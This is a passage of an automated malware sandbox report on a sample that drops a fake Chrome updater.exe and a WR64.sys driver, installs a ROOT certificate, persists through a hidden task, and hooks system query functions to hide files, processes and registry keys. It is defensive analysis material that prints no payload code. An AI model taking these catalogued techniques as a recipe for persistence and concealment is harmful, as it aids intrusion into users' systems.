Source: yfiogronfirx.tmp.0.dr	Static PE information: real checksum: 0x25e65 should be: 0x2b1bf

Source: ylVAEHbMLf.exe	Static PE information: section name: .xdata
Source: updater.exe.0.dr	Static PE information: section name: .xdata
Source: yfiogronfirx.tmp.0.dr	Static PE information: section name: .xdata

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD9B6DD2A5 pushad ; iretd	5_2_00007FFD9B6DD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD9B7F000C pushad ; iretd	5_2_00007FFD9B7F00C1
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6222B8 push rdx; retf	7_2_00000225DC6222B9
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6284FD push rcx; retf 003Fh	7_2_00000225DC6284FE
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6594FD push rcx; retf 003Fh	7_2_00000225DC6594FE
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6822B8 push rdx; retf	7_2_00000225DC6822B9
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6884FD push rcx; retf 003Fh	7_2_00000225DC6884FE
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6B94FD push rcx; retf 003Fh	7_2_00000225DC6B94FE
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AC22B8 push rdx; retf	8_2_00000202C0AC22B9
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AC84FD push rcx; retf 003Fh	8_2_00000202C0AC84FE
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AF94FD push rcx; retf 003Fh	8_2_00000202C0AF94FE
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6612E22B8 push rdx; retf	9_2_000002A6612E22B9
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6612E84FD push rcx; retf 003Fh	9_2_000002A6612E84FE
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6613194FD push rcx; retf 003Fh	9_2_000002A6613194FE
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE2722B8 push rdx; retf	10_2_000002BAAE2722B9
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE2784FD push rcx; retf 003Fh	10_2_000002BAAE2784FE
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE2A94FD push rcx; retf 003Fh	10_2_000002BAAE2A94FE
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAED922B8 push rdx; retf	10_2_000002BAAED922B9
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAED984FD push rcx; retf 003Fh	10_2_000002BAAED984FE
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879A84FD push rcx; retf 003Fh	11_2_0000026A879A84FE
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879A22B8 push rdx; retf	11_2_0000026A879A22B9
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537884FD push rcx; retf 003Fh	12_2_00000179537884FE
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537822B8 push rdx; retf	12_2_00000179537822B9
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537B94FD push rcx; retf 003Fh	12_2_00000179537B94FE
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D594FD push rcx; retf 003Fh	12_2_0000017953D594FE
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D5422B8 push rdx; retf	13_2_000002295D5422B9
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D5484FD push rcx; retf 003Fh	13_2_000002295D5484FE
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D5794FD push rcx; retf 003Fh	13_2_000002295D5794FE
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00000253067E22B8 push rdx; retf	14_2_00000253067E22B9
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00000253067E84FD push rcx; retf 003Fh	14_2_00000253067E84FE
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E794FD push rcx; retf 003Fh	14_2_0000025306E794FE

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\lsass.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\System32\lsass.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

File created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys

Jump to behavior

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 0000000F.00000002.2995389438.000001845B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1804050356.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3020568430.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1044, type: MEMORYSTR

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	File created: C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmp			Jump to dropped file
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	File created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe			Jump to dropped file

Boot Survival

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 0000000F.00000002.2995389438.000001845B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1804050356.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3020568430.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1044, type: MEMORYSTR

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YFIOGRONFIRX.TMP
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YFIOGRONFIRX.TMP
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YFIOGRONFIRX.TMP
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YFIOGRONFIRX.TMP

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Source: C:\Windows\System32\lsass.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
